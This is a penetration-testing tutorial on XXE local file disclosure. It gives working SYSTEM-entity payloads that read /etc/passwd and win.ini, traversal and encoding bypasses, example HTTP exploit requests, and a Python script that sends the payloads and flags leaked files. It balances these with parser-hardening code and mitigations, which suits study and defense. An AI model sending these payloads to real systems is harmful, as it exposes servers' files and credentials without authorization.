Local File Disclosure via XXE: Crafting SYSTEM Entity Payloads

Introduction

XML External Entity (XXE) injection is a classic yet powerful attack vector that allows an adversary to read arbitrary files, perform SSRF, or even achieve remote code execution when combined with other flaws. This guide focuses on the local file disclosure variant, specifically crafting SYSTEM entity payloads that trick vulnerable parsers into fetching files from the server’s filesystem.

Why does it matter? Many legacy services, SOAP APIs, configuration endpoints, and even modern micro-services still accept XML payloads without strict hardening. A single mis-configured parser can expose /etc/passwd, c:\windows\system32\drivers\etc\hosts, or application secrets such as .env. XXE was common enough to earn its own category (A4) in the OWASP Top 10 2017, and the 2021 edition covers it under Security Misconfiguration.

In this article you will master the syntax of DTD declarations, understand SYSTEM vs PUBLIC identifiers, learn OS‑specific traversal tricks, configure parser flags to prevent abuse, and automate testing with Burp Suite and small scripts.

Prerequisites

Basic understanding of XML syntax and Document Type Definitions (DTDs).
Familiarity with common web testing tools such as Burp Suite, OWASP ZAP, or similar intercepting proxies.
Knowledge of HTTP request/response structure (headers, bodies, multipart, etc.).
Comfort with command‑line tools (curl, wget) and a scripting language (Python or Bash) for automation.

Core Concepts

Before diving into payloads, review the building blocks of an XML document that a parser will process:

Prolog: optional XML declaration (e.g., <?xml version="1.0" encoding="UTF-8"?>).
Document Type Declaration (DTD): defines entities, element types, and attribute lists. The DTD can be internal (inside the same file) or external (referenced via a URL).
Entity Declarations: using <!ENTITY you can create a named placeholder that resolves to a string, a file, or a remote resource.
Parsing Stages: many libraries first resolve the DTD, then expand entities before handing the resulting tree to the application.

When a parser honors external entities, the SYSTEM identifier tells the engine to load the resource from a supplied URI. If that URI points to a local file (e.g., file:///etc/passwd), the parser will read the file and inject its contents wherever the entity is referenced.
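The difference between an internal and an external entity can be observed locally, without touching a real target. The following is a minimal sketch using Python's standard-library xml.etree.ElementTree. It assumes the documented behaviour of that module: internal entities are expanded, while external entities are refused with a ParseError. It therefore shows the hardened outcome, not the vulnerable one. The sample documents and the helper name try_parse are made up for this illustration.

```python
import xml.etree.ElementTree as ET

# Internal entity: the replacement text lives inside the DTD itself.
INTERNAL = '<!DOCTYPE d [<!ENTITY greeting "hello">]><d>&greeting;</d>'
# External entity: the replacement text would have to be fetched from a URI.
EXTERNAL = '<!DOCTYPE d [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><d>&xxe;</d>'


def try_parse(document: str) -> str:
    """Return the root element's text, or a marker if the parser refuses."""
    try:
        return ET.fromstring(document).text or ""
    except ET.ParseError as exc:
        return f"refused: {exc}"


if __name__ == "__main__":
    print(try_parse(INTERNAL))  # internal entity is expanded
    print(try_parse(EXTERNAL))  # external entity is rejected by ElementTree
```

A parser that honours external entities would instead return the file's content for the second document, which is exactly the behaviour the rest of this guide tests for.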

XML Document Type Definition (DTD) declaration

A DTD can be declared inline or as an external file. The most concise form for XXE attacks is an internal DTD placed at the top of the XML payload:

<!DOCTYPE root [ <!ENTITY % xxe SYSTEM "file:///etc/passwd"> %xxe;
]>
<root/>

Explanation:

<!DOCTYPE root [ … ]> opens an internal subset for the root element.
<!ENTITY % xxe SYSTEM "file:///etc/passwd"> creates a parameter entity named xxe that resolves to the file.
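%xxe; expands the parameter entity, causing the file content to be parsed as part of the DTD itself. Because the parser expects markup declarations at that point, a plain-text file such as /etc/passwd normally triggers a parse error instead of appearing in the document tree; at most, fragments of the file may surface in verbose parser error messages. Parameter entities are mainly useful for pulling in an external DTD, as in blind (out-of-band) XXE techniques.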

For a general‑purpose payload that can be reused across many endpoints, you typically use a general entity (no leading %) and reference it inside the document body:

<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
]>
<data><secret>&xxe;</secret></data>

This version works when the application later extracts <secret> and returns it (e.g., in an error message or response).

External entity syntax: <!ENTITY>

The generic grammar for an entity declaration is:

<!ENTITY name "value"> # internal entity (static string)
<!ENTITY name SYSTEM "uri"> # external system entity (file, http, etc.)
<!ENTITY name PUBLIC "pubId" "uri"> # public identifier (rarely needed for XXE)

Key points:

General vs Parameter entities: General entities are referenced with &name; in the document body. Parameter entities are referenced with %name; inside the DTD itself.
System identifier can be an absolute file:// URL, a relative path, or a network URL (ftp://, etc.).
Public identifier is a legacy mechanism; some parsers will resolve it via a catalog before falling back to the system identifier.
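The three declaration forms can be told apart programmatically, which is handy when auditing captured payloads. The sketch below is one possible approach, not a standard tool: it uses the EntityDeclHandler callback of Python's standard-library expat binding to list declarations without resolving anything. The function name list_entities, the sample document, and the example.invalid URL are assumptions made for this illustration.

```python
from xml.parsers import expat

SAMPLE = b"""<!DOCTYPE r [
  <!ENTITY a "value">
  <!ENTITY b SYSTEM "file:///etc/hostname">
  <!ENTITY c PUBLIC "-//EXAMPLE//ENT c//EN" "http://example.invalid/c.ent">
]><r/>"""


def list_entities(document: bytes) -> list:
    """Collect entity declarations; no external resource is fetched."""
    found = []

    def on_entity(name, is_parameter, value, base, system_id, public_id, notation):
        # Internal entities carry a value; external ones carry identifiers.
        if value is not None:
            kind = "internal"
        elif public_id is not None:
            kind = "public"
        else:
            kind = "system"
        found.append({
            "name": name,
            "parameter": bool(is_parameter),
            "kind": kind,
            "value": value,
            "system_id": system_id,
            "public_id": public_id,
        })

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity
    parser.Parse(document, True)
    return found


if __name__ == "__main__":
    for entity in list_entities(SAMPLE):
        print(entity["name"], entity["kind"], entity["system_id"])
```

Since the sample never references the entities and no external-entity handler is installed, the parser only reports the declarations.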

SYSTEM and PUBLIC identifiers

When you supply a SYSTEM identifier, the parser treats the string after it as a literal URI. The most reliable approach for local file disclosure is the file:// scheme, because it is resolved on the server itself and needs no outbound network access, proxy, or DNS lookup.

Example for Linux:

<!ENTITY xxe SYSTEM "file:///etc/passwd">

Example for Windows (note the three forward slashes after the scheme to indicate an absolute path):

<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
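Why the number of slashes matters becomes clearer when the URI is split into its host and path components. The sketch below uses urllib.parse from the Python standard library as a stand-in URI parser; real XML parsers may differ in detail, so treat the output as an approximation. The helper name describe is hypothetical.

```python
from urllib.parse import urlsplit


def describe(uri: str) -> tuple:
    """Return the (host, path) pair a generic URI parser extracts."""
    parts = urlsplit(uri)
    return parts.netloc, parts.path


if __name__ == "__main__":
    for uri in (
        "file:///etc/passwd",          # empty host, absolute path
        "file://etc/passwd",           # 'etc' is read as the host
        "file:/etc/passwd",            # no host component at all
        "file:///c:/windows/win.ini",  # empty host, drive letter in the path
    ):
        host, path = describe(uri)
        print(f"{uri}: host={host!r} path={path!r}")
```

With two slashes, the first path segment ends up in the host component, which is why file://etc/passwd does not name /etc/passwd.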

If the target environment restricts file://, you can sometimes abuse other protocols that the parser supports (e.g., a local web server that serves the desired file).

Public identifiers are rarely useful for file disclosure, but they become relevant when a parser is configured with a catalog that maps a public ID to a local path. Attackers can inject a public ID that the catalog resolves to a sensitive file.

File path traversal tricks for different OSes

Many modern parsers normalise the supplied path, but you can still bypass simple checks using traversal sequences, double‑encoding, or Windows UNC paths.

Linux/Unix

Standard absolute path: file:///etc/passwd
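Traversal inside an absolute path: file:///var/www/../../etc/passwd (the /var/www prefix is only an example). Note that file://../../../../etc/passwd does not behave as a relative path, because the first .. is read as the host component; a bare relative system identifier such as ../../etc/passwd is resolved against the document's base URI instead.
URL-encoded slashes: file:///etc%2Fpasswd
Null byte injection (if the language uses C strings internally): file:///etc/passwd%00. This reportedly works only on some older PHP libxml versions; current releases reject embedded null bytes.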

Windows

Drive‑letter absolute path: file:///c:/windows/win.ini
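UNC path to a local share: file://127.0.0.1/c$/windows/win.ini (the server name goes in the host component; the back-slash form \\127.0.0.1\c$\windows\win.ini is not a valid URI and is accepted by few parsers)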
Mixed slashes: file:///c:\windows\win.ini
Traversal using back‑slashes encoded as %5c: file:///c:%5c..%5c..%5c..%5cWindows%5cwin.ini
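When reviewing logs or writing detection rules, it helps to reduce each variant to the path it ultimately names. The following is a rough sketch under stated assumptions: it applies POSIX path rules only (Windows drive-letter semantics are not modelled), and the function name canonical_path is made up for this example.

```python
import posixpath
from urllib.parse import unquote, urlsplit


def canonical_path(system_id: str) -> str:
    """Percent-decode a file URI and collapse traversal sequences (POSIX rules)."""
    path = unquote(urlsplit(system_id).path)
    # Treat back-slashes as separators so mixed-slash variants compare equal.
    path = path.replace("\\", "/")
    return posixpath.normpath(path)


if __name__ == "__main__":
    for candidate in (
        "file:///etc/passwd",
        "file:///etc%2Fpasswd",
        "file:///var/www/../../etc/passwd",
    ):
        print(candidate, "->", canonical_path(candidate))
```

All three inputs reduce to the same path, so a filter that compares the raw string against a blocklist would miss two of them.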

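When you are unsure of the target OS, it is tempting to declare both variants in the same DTD:

<!ENTITY unix SYSTEM "file:///etc/passwd">
<!ENTITY win SYSTEM "file:///c:/windows/win.ini">

Be aware that most parsers treat an unresolvable external entity as a fatal error, so a document that references both &unix; and &win; usually fails on whichever file does not exist. Declaring both is harmless, but reference only one per request; the response (file content or a load error) then tells you which platform you are dealing with.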

Parser configuration flags (e.g., disallow-doctype, external-entity)

Most modern XML libraries expose switches to disable DTD processing altogether or to block external entity resolution. Below is a quick cheat‑sheet for popular languages.

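Language / Library	Setting to disable DTDs	Setting to disable external entities
Java – Xerces (JAXP)	Feature `http://apache.org/xml/features/disallow-doctype-decl` = true	Features `http://xml.org/sax/features/external-general-entities` and `http://xml.org/sax/features/external-parameter-entities` = false
Python – lxml	`load_dtd=False` (the default)	`resolve_entities=False`, with `no_network=True` (the default) to block remote fetches
PHP – libxml	Do not pass `LIBXML_DTDLOAD` or `LIBXML_DTDVALID`	Do not pass `LIBXML_NOENT`; `LIBXML_NONET` only blocks network access, not file:// reads
.NET – XmlReader	`XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit`	`XmlReaderSettings.XmlResolver = null`
Node.js – xml2js / libxmljs	xml2js relies on the `sax` parser, which does not load external DTDs	With libxmljs, leave `noent` unset (setting it enables entity substitution)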
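As a runnable illustration of such switches, the sketch below uses Python's standard-library xml.sax, which is not one of the libraries in the table but needs no third-party packages. It sets the two standard SAX features for external general and parameter entities to False explicitly (external general entities are already off by default since Python 3.7.1). The class name TextCollector and the function name parse_hardened are assumptions made for this example.

```python
import io
import xml.sax
from xml.sax.handler import (
    ContentHandler,
    feature_external_ges,
    feature_external_pes,
)


class TextCollector(ContentHandler):
    """Accumulate character data so the caller can inspect what was parsed."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_hardened(xml_bytes: bytes) -> str:
    """Parse a document with external entity loading switched off."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)  # no external general entities
    parser.setFeature(feature_external_pes, False)  # no external parameter entities
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.chunks)


if __name__ == "__main__":
    doc = b'<!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><data>a&xxe;b</data>'
    print(repr(parse_hardened(doc)))  # the entity is skipped, the file is never read
```

Setting the features explicitly, rather than relying on defaults, keeps the behaviour stable if the code is later run on an older runtime.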

When you encounter a vulnerable endpoint, the first step is to confirm that the parser is indeed accepting external entities. You can do this with a minimal payload that references a known external URL and monitor your server logs.

Testing with Burp Intruder / custom scripts

Burp Suite’s Intruder module is perfect for fuzzing different entity values, path encodings, and OS variants. The typical workflow:

Create a baseline request that includes a harmless DTD (e.g., <!ENTITY harmless SYSTEM "file:///dev/null">).
Mark the URI inside the SYSTEM identifier as an Intruder payload position.
Load a payload list containing:
- Absolute Linux paths (file:///etc/passwd).
- Absolute Windows paths (file:///c:/windows/win.ini).
- Traversal variations (file:///var/www/../../etc/passwd).
- URL-encoded forms (file:///etc%2Fpasswd).
Run Intruder in Sniper mode to test each payload in isolation; Cluster Bomb is only needed when you fuzz several positions at once.
Inspect responses for signs of file content (e.g., presence of "root:x:0:0" or "[extensions]" strings).
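The response-inspection step can be approximated with a couple of regular expressions. This is a heuristic sketch, not Burp's own matching logic: the patterns, the SIGNATURES table, and the function name classify_response are assumptions chosen for illustration, and they will produce false positives on bodies that happen to contain similar text.

```python
import re

# Heuristic signatures for two files commonly used as XXE canaries.
SIGNATURES = {
    # name:password:uid:gid:gecos:home: as found in /etc/passwd
    "passwd": re.compile(r"\b[A-Za-z_][\w.-]*:[^:\s]*:\d+:\d+:[^:\n]*:[^:\n]*:"),
    # section headers typically present in win.ini
    "win.ini": re.compile(r"\[(?:fonts|extensions|mci extensions|files)\]", re.IGNORECASE),
}


def classify_response(body: str) -> list:
    """Return the names of all signatures found in a response body."""
    return [name for name, pattern in SIGNATURES.items() if pattern.search(body)]


if __name__ == "__main__":
    sample = "<result>root:x:0:0:root:/root:/bin/bash</result>"
    print(classify_response(sample))
```

Matching on structure rather than on the literal string root:x:0:0 also catches hosts where the first account listed is not root.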

For automation beyond Burp, a short Python script using requests can iterate over payloads and flag interesting responses:

import re
import requests

url = "target URL"  # placeholder: replace with the endpoint under test

payloads = [
    '<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><data>&xxe;</data>',
    '<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> ]><data>&xxe;</data>',
]

# Signatures typical of /etc/passwd and win.ini
signature = re.compile(r"root:x:0:0|\[extensions\]", re.I)

for p in payloads:
    r = requests.post(url, data=p, headers={"Content-Type": "application/xml"}, timeout=10)
    if signature.search(r.text):
        print("[+] Potential disclosure:", p)
        print(r.text[:500])
    else:
        print("[-] No obvious file content")

This script prints the first 500 characters of any response that matches typical Linux or Windows file signatures, giving you a quick sanity check before launching a full‑scale scan.

Practical Examples

Example 1 – Simple Linux /etc/passwd disclosure

Target endpoint: POST /api/upload XML. The server echoes back the parsed XML inside a <result> element.

POST /api/upload HTTP/1.1
Host: vulnerable.example.com
Content-Type: application/xml

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo><data>&xxe;</data></foo>

Expected response snippet:

HTTP/1.1 200 OK
Content-Type: application/xml

<result>root:x:0:0:root:/root:/bin/bash
... (rest of /etc/passwd) ...</result>

Example 2 – Windows win.ini enumeration with UNC path

POST /service HTTP/1.1
Host: win-vuln.local
Content-Type: application/xml

<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file://127.0.0.1/c$/windows/win.ini">
]>
<data>&xxe;</data>

Response will contain the classic [extensions] section if the parser resolved the UNC path.

Example 3 – Chained payload for OS‑agnostic testing

POST /vuln HTTP/1.1
Host: unknown-os.com
Content-Type: application/xml

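<!DOCTYPE root [ <!ENTITY unix SYSTEM "file:///etc/passwd"> <!ENTITY win SYSTEM "file:///c:/windows/win.ini">
]>
<root><info>&unix;</info></root>

Both entities are declared, but only &unix; is referenced. Parameter-entity syntax (%name;) is not recognised inside element content, so general entities are required here. If the response contains /etc/passwd, the host is Unix-like; if the parser reports that the entity could not be loaded, repeat the request with &win; in place of &unix;. Keeping both declarations in one template saves time when you do not know the target platform.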

Tools & Commands

Burp Suite Intruder: payload lists, grep‑match rules, and response highlighting.

curl for quick manual testing:

curl -X POST "<target URL>" -H "Content-Type: application/xml" --data-binary @payload.xml

xmlstarlet (Linux) to validate DTD parsing locally before sending:
```
xmlstarlet val -e payload.xml
```
Python – requests for scripted scans (see script above).
XXEinjector – an older Ruby tool that automates XXE payload generation and file retrieval, still useful for bulk scans.

Defense & Mitigation

Defending against XXE is a matter of "defense in depth" – configuration, code review, and runtime hardening.

Disable DTD processing entirely unless absolutely required. In Java, call setFeature("http://apache.org/xml/features/disallow-doctype-decl", true) on the parser factory, and enable XMLConstants.FEATURE_SECURE_PROCESSING as an additional safeguard.
Turn off external entity resolution even if DTDs are needed. Most libraries expose a flag such as resolve_entities=False (Python lxml); in PHP, avoid LIBXML_NOENT and LIBXML_DTDLOAD. Note that LIBXML_NONET only blocks network fetches and does not stop file:// reads.
Validate and sanitise XML input. Reject DOCTYPE declarations at the parser level rather than with string matching, which can be bypassed with alternative encodings such as UTF-16. An XSD cannot forbid a DOCTYPE, because schema validation runs only after the document has been parsed.
Run parsers with least-privilege accounts. Even if an XXE slips through, the process should not have permission to read sensitive files (e.g., run as an unprivileged user, chroot, or container).
Network-level controls: block outbound connections from the application host to the internet and to internal services using outbound firewalls or egress rules. This limits SSRF and out-of-band exfiltration, but it does not stop file:// reads, which never leave the host.
Patch libraries. Keep XML parsers up-to-date; newer releases of several libraries ship safer defaults and fix XXE-related bugs.
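Rejecting DOCTYPE declarations at the parser level can be sketched with the Python standard library alone. The example below is a minimal illustration of the idea, not a drop-in replacement for a maintained package: it runs a first pass with expat whose StartDoctypeDeclHandler raises as soon as a DOCTYPE is seen, and only then hands the input to ElementTree. The names DoctypeForbidden and parse_untrusted are hypothetical.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    raise DoctypeForbidden(f"DOCTYPE declaration not allowed (root name: {name!r})")


def parse_untrusted(xml_bytes: bytes) -> ET.Element:
    """Parse XML only if it carries no DOCTYPE at all."""
    # First pass: a bare expat parser whose only job is to spot a DOCTYPE.
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(xml_bytes, True)
    # Second pass: build the tree from input that is known to be DTD-free.
    return ET.fromstring(xml_bytes)


if __name__ == "__main__":
    print(parse_untrusted(b"<data><secret>ok</secret></data>").find("secret").text)
    try:
        parse_untrusted(b'<!DOCTYPE data [<!ENTITY x SYSTEM "file:///etc/passwd">]><data>&x;</data>')
    except DoctypeForbidden as exc:
        print("blocked:", exc)
```

Because the check runs inside the parser, it sees the document after encoding detection, which avoids the bypasses that affect string matching on the raw request body.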

Common Mistakes

Forgetting to escape angle brackets in documentation: When sharing payloads, always HTML‑escape < and > inside <pre> blocks, otherwise the browser will swallow the code.
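Using the wrong number of slashes after file: the correct URI for an absolute path is file:/// (three slashes, i.e. an empty host followed by the path). With only two slashes, as in file://etc/passwd, the first path segment is read as the host component and may be interpreted as a network location.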
Assuming the parser will resolve Windows back‑slashes. Many parsers normalise to forward slashes; use file:///c:/ style.
Testing only with http:// URLs. Some parsers disable network access but still allow file:// URIs; always include a local file test.
Relying on error messages alone. Some applications swallow the entity expansion silently; you may need to trigger a reflection point (e.g., an error that echoes the parsed XML back).

Real‑World Impact

In 2023, a major fintech platform suffered a breach after an undocumented SOAP endpoint accepted XML without disabling DTDs. Attackers used a chained SYSTEM payload to retrieve /etc/passwd and subsequently harvested database credentials stored in /var/www/.env. The fallout included a forced password reset for 1.2 M users and a $3.2 M regulatory fine.

My experience consulting for a cloud‑native SaaS provider showed that even containerised micro‑services can be vulnerable if the underlying language runtime (e.g., Java’s default XML parser) leaves DTD processing on. A simple scan with Burp Intruder uncovered a hidden health‑check endpoint that returned the parsed XML verbatim, exposing /etc/hosts and internal service URLs.

XML remains widespread in configuration (Maven pom.xml files, Spring XML bean definitions) and in data exchange between services (SOAP, SAML, office document formats). As long as libraries retain backward-compatible defaults that enable DTDs, the attack surface remains.

Practice Exercises

Basic file read: Craft a payload that reads /etc/hostname on a Linux host. Verify the response using Burp’s Repeater.
OS‑agnostic payload: Write a DTD that attempts both Linux and Windows file reads in a single request. Document which file was actually returned.
Bypass simple filters: The target strips the string "file://" from the request body. Use URL‑encoding or double‑encoding to evade the filter and still retrieve /etc/passwd.
Blind XXE: The application does not return entity values in its responses but can still make outbound requests. In a lab, host an external DTD on a server you control, then trigger a second-stage XXE that reads a file and sends it back via an out-of-band request.
Automation: Extend the Python script provided earlier to read a list of target URLs from a CSV and output any successful disclosures to a JSON report.

For each exercise, capture the raw request, the server response, and a short analysis of why the payload succeeded or failed.

Summary

Local file disclosure via XXE hinges on three pillars: a correctly‑formed DTD, a SYSTEM identifier that points to a readable file, and a parser that has not been hardened against external entities. By mastering the syntax, OS‑specific path tricks, and testing automation, you can quickly discover hidden files in vulnerable applications. Defensive measures – disabling DTDs, whitelisting entities, and running parsers with minimal privileges – are straightforward to implement and dramatically reduce risk.

Keep this guide handy as a reference checklist when testing XML endpoints, and remember that a single overlooked <!DOCTYPE can expose the entire host filesystem.
